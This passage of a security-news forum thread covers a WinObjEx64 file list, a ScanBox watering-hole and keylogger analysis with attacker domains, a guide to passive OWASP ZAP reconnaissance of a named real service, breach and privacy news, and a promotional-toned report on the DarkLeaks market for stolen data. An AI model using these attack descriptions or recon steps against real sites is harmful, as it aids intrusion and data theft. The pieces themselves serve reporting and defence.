56c27e823eb044da4d7726f0d35d98822bd79344 *WinObjAdv\rsrc\110.ico 08b8573a1efd1803099698a011f3c3d6eb00d3da *WinObjAdv\rsrc\111.ico f9ea074c8c152d30af74f4b266ab80aaf10a2821 *WinObjAdv\rsrc\112.ico 13e524fbc7b803ab711e11fb61f1014641cff8b6 *WinObjAdv\rsrc\113.ico 69a5a4ed71a85e99b4806563a2739d7de5dc2e38 *WinObjAdv\rsrc\114.ico 3a9b58b48fd4dfcb356abfd915036d7195c3c29c *WinObjAdv\rsrc\115.ico 335fd760d495b9a68ccafbcfb52f4f1ddc90b3fc *WinObjAdv\rsrc\116.ico 2d9b7e5622ef1c6f96cf85d344a989df7d129530 *WinObjAdv\rsrc\117.ico aa221c069f9a53f9afa7fbccb4465ce4da6baf58 *WinObjAdv\rsrc\118.ico 530ac9c2d277d9908decb955618ab2b43995cd1f *WinObjAdv\rsrc\119.ico 4ef03bb6bbc10b1723770a03b6fd899d3be1044a *WinObjAdv\rsrc\120.ico d84cd22bab028700050a644be5c2a7dafcc4553a *WinObjAdv\rsrc\121.ico 557be784a62110a81aa0f4b620c210e165857905 *WinObjAdv\rsrc\122.ico 674f4875596c907ee8da940edff1e98401e8b7fa *WinObjAdv\rsrc\123.ico 041a38d1522858aaede0df6d42b2479c8300c988 *WinObjAdv\rsrc\124.ico c0832fe5bf96f11a8133bbed66449574a3fd9089 *WinObjAdv\rsrc\125.ico 0a2aeedde4dc3934e28d727396c1ff93fddf6a6e *WinObjAdv\rsrc\126.ico 56d12ceb51825d502ba3a096396404af56b8f817 *WinObjAdv\rsrc\127.ico b7c0bf31dd02382e151e4d62fc078bc292303ff9 *WinObjAdv\rsrc\128.ico 267f398bd643e7c1591412b2c7538b79e1159ca9 *WinObjAdv\rsrc\129.ico 1be3fd5b055f60b2c2357e9cb87dddad22542a95 *WinObjAdv\rsrc\130.ico 8b725d0d5552061a6cd88e17eda3d580c4fa7fde *WinObjAdv\rsrc\131.ico 9e89e0564daacd2bb36f906e4754d3a3b95141d7 *WinObjAdv\rsrc\132.ico f57a70dbb02c43ffcf8b6d028f775606a2be5d91 *WinObjAdv\rsrc\133.ico 863ce1668eccc967273a8fbaff5e29db81d4d047 *WinObjAdv\rsrc\134.ico d9bb1b62d374b1cfb0892d5e1437342701db2a1f *WinObjAdv\rsrc\135.ico 8c64531a70ad2bf61c050fd1e69a9d7e87549c35 *WinObjAdv\rsrc\136.ico 34356dcf20c4dd0adc3d363d25dcd7ed4e98bfa9 *WinObjAdv\rsrc\137.ico 656ccfe0b2a147b61b16321e14516e0c2dccbd57 *WinObjAdv\rsrc\138.ico 1721fe712b75808604318f015c09f6b2b469baf7 *WinObjAdv\rsrc\6001.ico 68b25362609b6db97c40b375e2497e2db4f5ee48 *WinObjAdv\rsrc\6002.ico 8f4a9ec169d9c6e80ae2a8ee1947dab63665337d *WinObjAdv\rsrc\Bitmap_125.bmp 6f5b29fffb021bf80ca91d6d67cfc019d63f7175 *WinObjAdv\rsrc\kldbgdrv.sys da3fa9f3a72da9bde1d73dd4b5f7d93b909fe3d6 *WinObjAdv\sup.c 38c463dcf6a834eea357bc766135dfa5210ba99c *WinObjAdv\sup.h 09ca1ed7f052113f24bf2f11c877538b772701a3 *WinObjAdv\supConsts.h e87a6e82d41f9b065e58fdc5a2acf362ca6969cb *WinObjAdv\treelist.c 7d5d97dcc923a87d5f6064fe1b9fdba5e04674fe *WinObjAdv\treelist.h a99d9f26e6df31641a6780993b96b76d0e0ce088 *WinObjAdv\ui.h e78a55a5c4a562c54d77b16f24b88c42fd6b3816 *WinObjAdv\WinObjAdv.vcxproj e9ba01dd003e20ab20191dabbebde20921abe3f6 *FILELIST.txt 5eedad7ce5b95dd191d1556072481e18295676fd *README.md 0d66462034a77394dc5272acdb8d13758f448b19 *TODO.txt 16ee9f3cf034a76595910177b911832de6a4081c *WinObjAdv.sln In attach compiled version. SHA1 818bf9f0d4189347e9bd157a2810615109423e62 *WinObjEx64.chm 957157318a64482f446b97c82afe786444b1b2ff *WinObjEx64.exe Copyrights WinObjEx64 developed by WinObjEx64 Project group, in the alphabetical order: EP_X0FF MP_ART This program uses Windows Debugger Local Kernel Debugging Driver © Microsoft Corporation. Please use this thread for bugreports. Also take a note that Windows 10 is supported *AS IS* since it wasn't released yet, official support will be added after official release. Download Source
  16. ScanBox is a framework in the form of a JavaScript file. The function of ScanBox is to collect information about the visitor’s system without infecting the system. And this information includes things like the last page the user was on before visiting the compromised website, the OS of the system and the language settings of the system, the screen width and height, the web browsers used by the victim, the geographical location, security softwares used and programs like Java, Acrobat Reader, MS Office and Adobe Flash versions used. ScanBox also can log the keystrokes the victim is typing inside the website under the control of the attacker, which could include the passwords and other sensitive information of the users. And all this information is then sent to a remote C&C server controlled by the attackers. ScanBox’s goal is to collect information that will later be misused to compromise specific targets. The ScanBox framework has been deployed on several websites belonging to disparate companies and organizations in different countries. Attackers were able to compromise the website and include code that loaded a malicious JavaScript file from a remote server. ScanBox is particularly dangerous, as it doesn’t require malware to be successfully deployed to disk in order to steal information. Instead the key logging functionality would do the same work by simply requiring the JavaScript code to be executed by the web browser. The framework also facilitates surveillance, enabling attackers to exploit vulnerabilities in visitors’ systems by pushing & executing malware. ScanBox is designed to be a modular and reusable JavaScript based exploit kit. It allows a lesser number of sophisticated attackers to first compromise a website using basic attacks such as SQL injection or WordPress bugs and set up a waterhole attack to infect hundreds to thousands of victims who visit that website. Some of the recent attacks which used ScanBox are the following: Table 1: List Of Attacks Month Identified Country Sector/Type Scan Box domain August 2014 JP Industrial sector js.webmailgoogle.com September 2014 CN Uyghur code.googlecaches.com October 2014 US Think tank news.foundationssl.com October 2014 KR Hospitality qoog1e.com By analyzing the script used in these attacks, it has been found that the base codes are pretty much the same and they differ in implementation. This shows that different attackers are using ScanBox as a tool for their attack. The framework was altered according to the victims’ browsers and other factors in every case. Researchers say that the changes may be the result of the upgrades in the framework. The common codebase in all the attacks leads to a conclusion that all the attackers share some resources in using this framework. Working Step 1: The basic step of the ScanBox framework is to configure the C&C server. This server helps to collect and store the information obtained from the compromised website. Figure 1: ScanBox framework for collecting data Step 2: The collected information is first encrypted before sending it to the C&C server to ensure security. Figure 2: Function for data encryption Step 3: After completion of the encryption process the following request is passed: Figure 3: Request produced after encryption Step 4: The encrypted data finally reaches the C&C server and is decrypted to obtain the original data. These pieces of information are the key for starting the attack. Figure 4: Decrypted data Figure 5: Working of ScanBox framework Plugins Several plugins are loaded accordingly in between to extract the required information. These are selectively added to avoid any kind of suspicious alerts when the page loads. The following are some plugins used during the process: Pluginid 1: List the software installed in the system and also to check if the system is running any different versions of EMET (Enhanced Mitigation Experience Toolkit). Figure 6: Pluginid 1 code Pluginid 2: Determines Adobe Flash versions Pluginid 5: Determines Microsoft Office versions Pluginid 6: Enumerates Adobe Reader versions Pluginid 8: Lists Java versions Pluginid 21: Plants a keylogger inside the compromised website. It records all the keystrokes the person is typing in the website. The logs may include account password and other details. The recorded logs are sent to the corresponding command and control center. This information is later used to launch an attack against the particular user. The keylogger feature of ScanBox helps the attacker to collect the data without loading a malware from the disc. Therefore any malware removal tool won’t be able to find this. Figure 7: Keylogger plugin code The plugins required to load a page on different browsers are different. An attacker should be well aware of the version and type of browser used by the victim. According to the requirement, the plugins are loaded so that the desired result could be obtained. The following is the list of plugins loaded per browser on code.googlecaches.com. Table 2: Plugins loaded per browser on code.googlecaches.com Plugin ID Description Internet Explorer Chrome Firefox Safari 1 Software reconnaissance Y N N N 2 Browser plugin N Y Y Y 3 Flash recon Y Y Y Y 4 SharePoint recon Y N N N 5 Adobe PDF reader recon Y N N N 6 Chrome security plugins recon N N Y N 7 Java recon Y Y Y Y 8 Internal IP recon N Y N N 9 JavaScript keylogger Y Y Y Y It has been found that Google Chrome is less vulnerable to such attacks than others on the list due to their security update between the interval of 15 days, which makes it a bit difficult to carry out the attack. Also the Aviator Web browser set up by WhiteHat Security provides impressive privacy and security settings by default. Watering Hole Attack This is a type of attack is mainly targeted on businesses and organizations. Waterholing attacks drive the ScanBox framework. The attacker keeps an eye on the websites the victim visits frequently and infects the websites with a malware. These type of attacks are hard to detect. Once the targeted victim enters the infected website, the malware finds a way into the victim’s network or system. The dropped malware may be in the form of a Remote Access Trojan (RAT), which allows the attacker to access delicate and personal information. The main goal of the watering hole attack is not to serve maximum malware to the system, but to exploit the websites frequently visited by the targeted victim. Figure 8: Watering hole working A watering hole attack could be carried out with the help of ScanBox framework. In this method the JavaScript does its job and saves the attacker from using a malware. This type of attack using ScanBox has much more efficiency than using a malware and could not be detected by any malware removal tool. You can see the list of watering hole attacks which used ScanBox in Table 1. Precautions Regular Software Updating: Timely upgrade on the software reduces the vulnerability of such attacks. Vulnerability Shielding: It helps to scan suspicious traffic and any deviation from the normal protocols used. Network Traffic Detection: Even though hackers find different ways to access the information, the traffic generated by the final malware in communicating with the C&C server remains consistent. Identifying these paths helps to take control of the effect of such attacks. Threat Intelligence: A subscription of prominent threat intelligence providers will help you to track down all the command and control servers that it connects to. These C&C servers can be fed to proxy or perimeter devices to see any successful communication has been established or not. Least privilege: The concept of least privilege has to be implemented on all users who log on to the machine. Admin privilege has to be limited to certain users only. Next generation firewall: Use of a next generation firewall can detect such type of attacks easier, as they have an inbuilt sandbox. SIEM: By using a SIEM solution, security administrators will be able to monitor all the traffic by capturing the logs. It will give a holistic view of what is happening on your network with a few clicks on a single dashboard. Conclusion By the detailed analysis of ScanBox framework, we can say that it could be very dangerous if the user is not cautious. Thorough monitoring and analysis of computer and network should keep such attacks bolted to an extent. References Cyber security updates: October 2014 ScanBox Framework — Krebs on Security https://www.alienvault.com/open-threat-exchange/blog/ScanBox-a-reconnaissance-framework-used-on-watering-hole-attacks AlienVault discovered Watering Hole attacks using Scanbox for reconnaissanceSecurity Affairs Source
  17. Twitter has revised and simplified its rules and process for reporting abusive behavior on the service, and users now have the ability to report people who are posting their personal information. The change essentially gives Twitter users a method to combat doxing, which is the process of dumping a victim’s personal information online. This often is done as a form of revenge or to embarrass someone. Doxing used to be done in forums or on underground sites, but Twitter has made it possible to broadcast the information to a much larger audience more quickly. Twitter officials are well aware of this problem, as well as the issue of more traditional abusive behavior on the service. So the company has changed the way that users can report such behavior and what kind of things they can report. Twitter said it has greatly increased the size of its staff handling these reports and is processing many more reports than just a few months ago. “Over the last six months, in addition to the product changes, we have overhauled how we review user reports about abuse. As an example, allowing bystanders to report abuse – which can now be done for reports of private information and impersonation as well – involved not only an update to our in-product reporting process, but significant changes to our tools, processes and staffing behind the scenes. Overall, we now review five times as many user reports as we did previously, and we have tripled the size of the support team focused on handling abuse reports,” Tina Bhatnagar, vice president of user services at Twitter said in a blog post. The change is a significant one for Twitter, as the service has evolved into the place where many people not only get their news, but also where people share remarkable personal and private information. The new reporting option also allows users to report abusive behavior that’s targeted at other people and not themselves. Twitter also is changing the way that is enforces the rules against problematic accounts. “We are also beginning to add several new enforcement actions for use against accounts that violate our rules. These new actions will not be visible to the vast majority of rule-abiding Twitter users – but they give us new options for acting against the accounts that don’t follow the rules and serve to discourage behavior that goes against our policies,” Bhatnagar said. Source
  18. How To Assess a Third Party Web Site or Cloud Service with the OWASP ZAP Attack Proxy When You Don’t Have Permission to Pentest As a security professional, you will often be asked to give your opinion or assessment on the security of a third-party web site or cloud service. The person asking the question will usually have no authority to give you permission to run a penetration test on the remote site, and the chances that you can secure permission from the remote site’s owner will also be remote. If this happens to you, are you stuck? Actually, the answer is no. There is plenty of reconnaissance you can perform on a third-party service without requesting special permission, as long as you have a solid attack proxy and a plan. Introducing the OWASP ZAP Attack Proxy One of the top free tools in application security and pentester toolboxes these days is the OWASP ZAP attack proxy. (“ZAP” stands for “Zed Attack Proxy.”) In pentest mode, this tool can map a site, attempt exploits and fuzz input, but using these capabilities against a third-party site without the owner’s permission can be an invitation for trouble. Fortunately, third-party site owners usually grant permission during trial and demo periods to try out their site and service using normal web browsers and mobile devices. The trick to good (and legal) reconnaissance is to only capture and analyze the traffic available in the trial period, and this happens to be another application at which OWASP ZAP excels. Setting Expectations and Getting Internal Permission Before you do anything technical, however, you should set expectations and get some cover from the person who requested the assessment. In the process of doing this, you will also lay out your plan, request access to a demo account, and explicitly tell the requester what you are not going to do (i.e., “hack” or run a “pentest”). After you do more of these evaluations you will surely develop your own template, but the following message will get you started: For your own protection, please do NOT begin your research until you get: A positive acknowledgment to your “Is this OK?” question in writing. A working demo account, which you have tested using a regular Web browser. Planning Your Reconnaissance If you don’t get to hack, what can you do? Actually, the list of items you can investigate from normal traffic is often long enough to make a judgment call on the security posture of the target service. In this article we’ll cover “just” nine, but you could certainly look at many more. Use of HTTPS to protect traffic Quality of SSL certificate Avoids client-side secrets or authentication Up-to-date software Secure site headers Proper location and protection of vital assets Avoids information leakage through “extra” fields Access controls on web APIs (sometimes) Evaluation of legal and privacy policy Preparing OWASP ZAP and Your Browser To use OWASP ZAP in a noninvasive, passthrough mode, you need to set ZAP up as a proxy. From ZAP’s main menu, select “Tools | Options”. In the “Local Proxy” section, set the address and port your browser will use (The defaults are an address of “localhost” and a port “8080”). In the “Dynamic SSL” section, click the “Generate” button to create a CA certificate to use to facilitate your HTTPS connections. Still in the “Dynamic SSL” section, click the “Save” button to save a copy of this CA certificate as a *.cer file (You will want to import this CA into your browser soon to avoid “untrusted SSL certificate” blocks). Pick the Web browser you want to use to examine the remote site. Since I use Chrome for my daily browsing, I usually use Firefox as my secondary browser for Web analysis. Open your selected Web browser and set up its proxy settings, located here in current versions of Firefox (“Options” dialog, “Network” tab, “Connection” section, “Settings” button): …IE (“Settings” icon, “Internet Options” option, “Connections” tab, “LAN Settings” button) …and Chrome (“Settings” dialog, “Slow advanced settings…” link, “Network” section, “Change proxy settings…” button, then see “IE” entry above because it uses the same “Internet Properties” dialog as IE). Once you have configured your proxy, you should also import the proxy’s SSL CA certificate so your browser will not warn you about a bad certificate (the proxy’s certificate) every time you contact an HTTPS server. In Firefox, the list of trusted CA certificates is available from the “Certificates” tab in the program options. In IE and Chrome, the list of trusted CA certificates is also available through each browser’s options, but is actually saved in the local Windows operating system, not the browser itself. To test all this, restart your selected browser, make sure OWASP ZAP is running, and contact an HTTPS-protected site like https://www.google.com. You may immediately see a certificate warning page like this: …because the certificate presented by the proxy does not match the target, but you should have an option to “Add Exception” or “Proceed” because you already added the proxy’s certificate to your list of trusted CAs (E.g., you get a yellow warning you can ignore instead of a red error that stops you from proceeding). To proceed, click the available link and inspect the provided certificate. If you performed your steps correctly you will “OWASP” all over it. Click the “Permanently store this exception” box and then click the “Confirm Security Exception” button (or similar controls) to dismiss the error and proceed with your connections. Bypassing the Proxy for Certain Sites As you perform research on various sites, you may also want to set up a list of sites that will not be queried through the proxy. These settings are usually near your browser’s other proxy settings. For example, in Firefox, they are immediately below the proxy host and port settings. Performing Your Reconnaissance Now that you have OWASP ZAP and your browser set up, let’s proceed with some reconnaissance. Our sample target today will be a web services company called EventMobi, which hosts a public demo at MFG 2015. (Remember, we’re being non-invasive, so public resources are best!) Use of HTTPS to protect traffic To get started, simply open up the public demo link in your browser. (Do NOT enter it into the inviting little “URL to attack” field in OWASP ZAP!) Since we’re going through a proxy that may tie things up, you may need to refresh your browser (or perform the “Resolving Missing Images” procedure below) a few times to get all the content you want, but in less than a minute you should see a valid web page in your browser: …and some folders will start to appear in ZAP under the “Sites” list. Notice that pages are already listed as coming from “http” or “https.” In the case of our sample site, it’s clear that all content is being served from http, and that we haven’t been pushed to https automatically. To research this further and see if https is an option if we want secure transport, we can go back to the browser and simply change the main URL from MFG 2015 to https://eventmobi.com/mfg2015/attendees/76204. In this case, the site doesn’t load (there is an eternally spinning “loading” circle), so we switch to a “normal” browser (not going through the proxy) to confirm the lack of HTTP support. Since the behavior is the same with our proxied and normal browsers, we reach an unfortunate conclusion: this site doesn’t use HTTPS by default, and won’t support HTTPS if we ask for it. Resolving Missing Images To resolve images and other resources that come from other sites, you may need to perform the following procedure, especially if they are being served from HTTPS resources. Right-click the non-resolving resource (such as an image) and right-click “Copy Image Location” (or similar). In a new tab, paste the URL from the previous step. Click through any certificate resolution or other site-specific errors until the specific resource resolves. Go back to the tab with the main application and refresh it to resolve all resources from the same site. Assessment of Sample Site For “use of HTTPS to protect traffic,” we conclude that this site is weak because it doesn’t use HTTPS by default, and won’t support HTTPS if we ask for it. Quality of SSL certificate While we’re on the subject of HTTPS, we should step out out of our proxied browser again and inspect the real X.509 certificate being offered up by our target site. We can usually do this by clicking the lock or certificate icon near our page URL. Here is what that looks like in Chrome (my daily, non-proxy browser). To get even more information, click “Certificate information.” There are generally three things you want to look for here. First, make sure that there is a fully trusted path to a legitimate CA. This certificate is in good shape. Next, check the “CN” on the certificate (usually in the “Subject” field). In this case, the certificate looks like a “wildcard” certificate because the CN is for the entire domain rather than a specific server. This is often a good sign, because wildcard certificates indicate that a company is large or stable enough to spend the extra money on a site-wide certificate. Finally, take a look through the other fields on the certificate. In this case, there is an interesting list of what appears to be customer-specific sites in the “Subject Alternative Field.” If you plan on using your own domain name through the provider, having this list broadcast to anyone who connected to the provider’s Web site might or might not make you nervous. Assessment of Sample Site For “quality of SSL certificate” we conclude that this site is OK because it uses a valid X.509 certificate, but could be better since the certificate seems to be leaking the URLs of some other customer sites. Avoids client-side secrets or authentication Now that we’re done with SSL and certificates, let’s look at the application itself. To see how it works, click throughout the application in your proxied browser. (In other words, try to go everywhere you can through links, buttons and forms.) Once you have a nice set of data, return to the ZAP console and open the tree that corresponds to our target site (in this case, “http://evenmobi.com“). Then drill down into a particular request and click the “Response” tab to see what the target site is telling us. What we are mostly looking for here is JavaScript or other client code that is performing authentication requests, especially passwords accidentally sent to the client. (To help detangle hard-to-read JavaScript, remember to use a JavaScript Beautifier.) Our target site has a lot of its resources in a “webapp/view/high/js” tree, so we can drill down there to look at individual files. Another place to look for potential exposure is the history of requests at the bottom of the ZAP console. In this case, ZAP has highlighted a “*.js” file that contains the word “password” and warrants further inspection. A complete analysis of client code, authentication routines and unsafe password handling is beyond this article (and could take more time than the rest of the steps combined), but suffice it to say that our target site passed its inspection. Assessment of Sample Site For “avoids client-side secrets or authentication” we conclude that this site is fine because it doesn’t do client-side authentication and keeps its passwords safe on the server. Up-to-date software Most Web sites depend on a variety of third-party libraries and applications, and many sites lag behind the most current and secure versions of these components. This problem is so widespread that OWASP continues to track it as #9 in its Top Ten Web Vulnerabilities. Fortunately ZAP can help us look for these in three ways. First, we can look at Web site headers for Web software version numbers. Unless it’s suppressed by the target server or intervening firewall, this information will be displayed in any content response from the site. In this case we see that the site is claiming to run version 1.1.19 of the nginx Web server. Checking the nginx release history, we see that that version was released in April 2012 – almost three years ago. We can also look up nginx security vulnerabilities to see that our target server may have a number of “medium” severity vulnerabilities (fortunately no “major” vulnerabilities), including: SSL session reuse vulnerability Request line parsing vulnerability Memory disclosure with specially crafted HTTP backend responses Vulnerabilities with Windows directory aliases Second, we can use ZAP to look for application environment versions. These may be displayed if we access “Web application” files like *.php, *.aspx, etc. (Hiding this information is a best practice, so it may not appear on all sites.) n this case we see that the remote site is running PHP version 5.3.10, and is also probably running Ubuntu with a Linux kernel version of 3.15. That suggests that the operating system was updated at least once in the past year (OK), but that the PHP environment has been deprecated (all support, including security support, terminated in mid-2014). Finally, we can also use ZAP to check standardized JavaScript libraries and other includes for vulnerable versions. These may be easy to find in the list of downloaded assets: …or may be buried in inline page includes (which requires looking through downloaded content). In this case, we can check at least three standard libraries for known vulnerabilities: socket.io (version 0.9.11) – current version is 1.3.3; this version appears safe jquery (version 1.7) – current version is 1.9; this version appears safe keen (version 2.1.0) – current version is 3.2.2; this version appears safe etc… Assessment of Sample Site For “up-to-date software” we conclude that this site is worrisome because it is running a pretty old version of its Web server software with several known vulnerabilities and an out-of-support version of PHP. (The application JavaScript components appear fine, but the Web server and PHP issues are enough to cause concern.) Secure site headers A sign that a service takes security seriously is the use of special Web site headers designed to prevent XSS and related exploits. Many of these headers are detailed on other sites, but some of the best ones to look for are: X-Frame-Options: SAMEORIGIN or X-Frame-Options: DENY X-Content-Type-Options: nosniff (Missing) X-Powered-By… Strict-Transport-Security Content-Security-Policy Using ZAP, these would show up in the Response section of most file requests. Unfortunately, none of the secure headers we would like to see are used by our target site, and as we saw above, the target site quite happily uses an “X-Powered-By” header to tell us about the underlying application (PHP) and OS (Ubuntu Linux) environment. Assessment of Sample Site Our target site does not use any “secure site headers,” and does not suppress headers that may provide helpful information to hackers. Proper location and protection of vital assets One of the many things ZAP does well is organize detected assets by site of origin. This makes it easy to see where a target site stores its assets and runs its application. In the case of our target site we can see resources come from newrelic.com, linkedin.com, amazonaws.com and google-analytics.com, among other places. For now we will ignore the tracking and advertising sites and zero in on resources pulled from Amazon’s S3 storage service. To see these, open up the related tree until you can drill down to an asset. Notice that the full URL of each asset is available in ZAP. To see whether or not an asset is accessible without any access control, copy its URL into an “incognito” browser window in a non-proxy browser. (ZAP provides a right-click “Copy URLs to Clipboard” option for this exact purpose.) If you can pull up the resource in a fresh, incognito browser session, there is generally no access protection and anyone with the URL to the resource can access it. In some cases this is OK, but if confidential information is ever accessible in this way you could have a leak on your hands. Assessment of Sample Site In terms of “proper location and protection of vital assets” there are a number of company-specific assets that are stored on publicly-accessible storage at Amazon. Since all the information we plan to store in this application is public anyway, this is OK, but we would need to see a different storage mechanism in place with enforced access controls if we planned to use the service with any confidential information. Avoids information leakage through “extra” fields It is common for Web applications, particularly Web services, to provide “extra” information with requests that client-side (usually JavaScript) code will filter out. However, all this information is easily accessible to interested parties, including you. To look for this type of information using ZAP, look for large page or Web service requests in your history, then dig into the fields provided. Remember to cut/paste data in JSON prettifiers and other tools if you need help visualizing it. For example, here is an abbreviated response from our sample site: { "response":{ "id":"76204", "name":"Attendees", "items":[ { "id":"1812359", "first_name":"James Avery", "about":"", "image50":"50mfg-m-01.jpg", "image100":"100mfg-m-01.jpg", "title":"Support Specialist", "company_name":"Metropolitan Financial Group", "website":"http://www.eventmobi.com", "facebook":"http://www.facebook.com/eventmobi.com", "twitter":"http://twitter.com/eventmobi", "linkedin":"http://www.linkedin.com/in/eventmobi", "url":"http://api.eventmobi.com/en/api/v1/events/MFG2015/sections/76204/items/1812359" }, { "id":"1812360", "first_name":"Joe Baker", "about":"", "image50":"50crop_547c946dd931f_128_(1).jpg", "image100":"100crop_547c946dd931f_128_(1).jpg", "title":"CEO", "company_name":"Metropolitan Financial Group", "website":"http://www.eventmobi.com", "facebook":"http://www.facebook.com/eventmobi.com", "twitter":"http://twitter.com/eventmobi", "linkedin":"http://www.linkedin.com/in/eventmobi", "url":"http://api.eventmobi.com/en/api/v1/events/MFG2015/sections/76204/items/1812360" }, This is a block of JSON that shows that the target site will happily dump a complete attendee list, including self-provided contact information. Assessment of Sample Site In terms of “Avoids information leakage through “extra” fields” the target site is OK. Although interesting fields such as “linkedin” are revealed, they must be added by individual users and are probably easy to find through other publicly available sources. Access controls on web APIs After you have identified a few key API service calls in ZAP, copy the URLs out and try them in your incognito Web browser to see if they are protected by any access controls. In the case of our sample site, there do not appear to be any access controls on the API. Assessment of Sample Site In terms of “access controls on Web APIs” there do not appear to be any access controls. This may be OK for public information, but if information such as lists of attendees is sensitive, then we may be concerned. Evaluation of legal and privacy policy Finally, you can put ZAP down for a minute and read some legalese. Go back to the target site using a non-proxy Web browser and find its legal terms, privacy or security policy. For our target site, a privacy policy can be found at http://www.eventmobi.com/legal/privacy-policy/ At a high level, you are looking for promises of privacy or security made in the legal policy that do not seem to be backed up with technical controls. As it turns out, our target’s privacy policy is weak, but accurately describes what they do or do not do. In a section about the type of information collected and its use, our target accurately lists what they collect and states that the information of participants is “publicly available online” (as we saw while looking at Web service access controls). In the “Security” section we see a statement about “suitable procedures” to protect information collected online. This is vague enough to encompass what we saw in our investigation (e.g., no encryption for public information), but without more inspection we have to take our target on its word. Finally, another “Security” section contains a vague promise of “security measures,” and then honestly puts the onus of not posting anything confidential on the users. Assessment of Sample Site Our “evaluation of legal and privacy policy” did not give us great confidence in the security of the site, but it agrees with our overall technical assessment. For that reason, it strikes us as an honest policy. Filing Your Report Now that you have completed your analysis, it’s time to provide a recommendation based on your limited information. Remember that your requester is primarily looking for a simple answer to this question: “Is this service safe enough for the job?” A typical results report might resemble the following template. For example, an evaluation of our sample target might yield the following report. Source
  19. TalkTalk has admitted to a major breach of user information, which may have led to some customers handing over bank information to hackers. In an email to customers, the company said it first saw a big increase in malicious scammers claiming to be from TalkTalk at the end of last year. Following an investigation it said some of its customer information, such as names, addresses, phone and account numbers, could have been illegally accessed, with scammers quoting these details to customers. Consequently a small number may have revealed more in-depth information, such as bank details. In some of these cases we know they may be using the information they have illegally obtained, the telecoms and services provider said. In a statement it said: "At TalkTalk we take our customers' security very seriously and we take numerous measures to help keep our customers safe. Yet sadly in every sector, criminal organisations using phone and email scams are on the rise." "As part of our ongoing approach to security we continually test our systems and processes ... following further investigation into these reports, we have now become aware that some limited, non-sensitive information about some customers could have been illegally accessed in violation of our security procedures." "We are aware of a small, but nonetheless significant, number of customers who have been directly targeted by these criminals and we have been supporting them directly," it continued. "We want to reassure customers that no sensitive information, such as bank account details, has been illegally accessed, and TalkTalk Business customers are not affected," it added. The company said it is liaising with the Information Commissioner's Office and is writing to all its customers to offer advice about the criminal activity. An ICO spokesperson said: “We are aware of a possible data breach involving TalkTalk and are making enquiries into the circumstances.” Source
  20. The breaches at Community Health Systems and Anthem, Inc. serve as prime examples of how valuable health care data can be to cybercriminals, but a recent study suggested that these intrusions should not be the only cause for concern for consumers. A study conducted by Timothy Libert, a doctoral student at the University of Pennsylvania's Annenberg School for Communication found that nine out of ten health-related websites expose information regarding visitors' health interests with third parties. The websites included in the study, titled “Privacy Implications of Health Information Seeking on the Web,” are non-profit, educational, commercial, and government-run. Sites such as WebMD, send data to up to 34 separate domains, according to a video by Libert on the study. Using a tool he created that tracks HTTP requests initiated with third-party advertisers and data brokers, Libert was able to analyze 80,000 health-related web pages. According to his findings, 91 percent of the sites initiated requests to third-parties and 70 percent included data on specific “symptoms, treatment, or diseases.” Those on the receiving end of the information included advertisers such as Google – which collected data from 78 percent of the pages, comScore (38 percent) and Facebook (31 percent), in addition to data brokers Experian and Acxiom. The findings suggest that the privacy of users may be at risk seeing as this data can be sold by data brokers legally, which further increases spreads the personal information, thus increasing the risk of compromise. Additionally, thanks to current marketing technology, consumers While the Federal Trade Commission has advocated legislation to regulate the use of tools that many marketers and data brokers use to collect and sell consumer data, there is currently little oversight. “Personal health information – historically protected by Hippocratic Oath – has suddenly become the property of privacy corporations who may sell it to the highest bidder or accidentally misuse it to discriminate against the ill,” Libert said in a release by the university. “As health information seeking has moved online, the privacy of a doctor's office has been traded in for the silent intrusion of behavioral tracking.” Source
  21. An all new anonymous online underground black market website, DarkLeaks, has been introduced on the Internet where Whistleblowers, blackmailers, hackers and any individual can trade/sell sensitive and valuable data/secrets anonymously in exchange for Bitcoin payments. DarkLeaks is a decentralized underground blackmarket which is built on top of the Bitcoin Blockchain technology and is available on the Internet to download as a free software package together with its source code published openly on code-sharing site Github. TRADE INFORMATION ANONYMOUSLY DarkLeaks underground black market website is masterminded by the members of crypto-anarchist collective System. "There is no identity, no central operator and no interaction between leaker and buyers," the developers' statement says. Blockchain technology is developed for secure Bitcoin payments, where users can make transactions directly without need of any intermediary. Blockchain encrypts the files which are released when payment is claimed by the leaker. NO LIMITS TO TRADE CONTENTS The developers of DarkLeaks underground black market website said that it is the best tool to trade any kind of secret, illegal or confidential, but valuable data, including media, information, video, data and documents. The list of contents that can be shared is as follows: Hollywood movies Trade secrets Government secrets Proprietary source code Industrial designs like medicine or defence Zero day exploits Stolen databases Proof of tax evasion Military intelligence Celebrity sex pictures Corruption HOW DOES DARKLEAKS WORK ? The files on sale are encrypted by DarkLeaks black market website, broken into smaller pieces, and then added to Bitcoin's block chain. However, the service allows the buyer to verify small preview piece of the file before payment is claimed. After buyer purchase the rest of the file when satisfied with the contents, the seller claims their Bitcoins. A decryption key is provided to the buyer in order to unlocks the encrypted document for the buyer. "The mechanism involved makes the environment free from intervention." DON'T BE AFRAID, JOIN HANDS WITH US The concept is different, but isn't new, as many existing portals, such as the infamous WikiLeaks, used for sharing secret information by whistleblowers and others, but has never been an opportunity to exchange those information for profit. However, DarkLeaks is taking things to the next level, making the information sharing portal a direct purchase transaction. The developers say that Darkleaks will help "stop corruption and challenge power", and at the same time encourage users by saying, "Don't be afraid. Come join the revolution and reclaim your freedom. The gloves are off. The revolt has begun." source
  22. After weeks of mounting pressure from national governments for increased access to personal data following the Charlie Hebdo attack, the European Parliament has pulled a switch that aims to simultaneously increase citizens’ privacy rights while also giving law enforcement agencies more ability to track travellers. As they twist and turn like a twisty turny thing, MEPs are essentially leveraging national governments’ desire for a PNR (Passenger Name Record) tracking system to get the draft Data Protection Regulation legislation approved. In a resolution approved by 532 votes to 136, with 36 abstentions, lawmakers demanded that member states make faster progress on the new data protection laws “so that talks could proceed in parallel with those on an EU Passenger Name Record proposal”. In other words, give us what we want and we might relent on our opposition to PNR. MEPs said they would work “towards the finalisation of an EU PNR directive by the end of the year”. However, Jan Philipp Albrecht, the German MEP who has successfully steered the Data Protection Regulation this far, was against the move, believing that PNR should not be negotiated on any terms. He points to the ruling by the European Court of Justice last year which annulled the Data Retention Directive on the grounds that indiscriminate, blanket data retention is illegal. There are concerns from some MEPs that PNR, which the the Parliament has in the past rejected, is exactly the sort of blanket information gathering that the ECJ blocked. The PNR proposal would involved gathering all the information collected by airlines about passengers, including sensitive and personal information such as email addresses, credit card details, phone numbers, meal choices (halal, kosher, etc). Even Birgit Sippel, an MEP who voted in favour of the resolution, admitted that “the current draft EU PNR proposal needs to be revised to comply with the ECJ judgement on the Data Retention Directive". 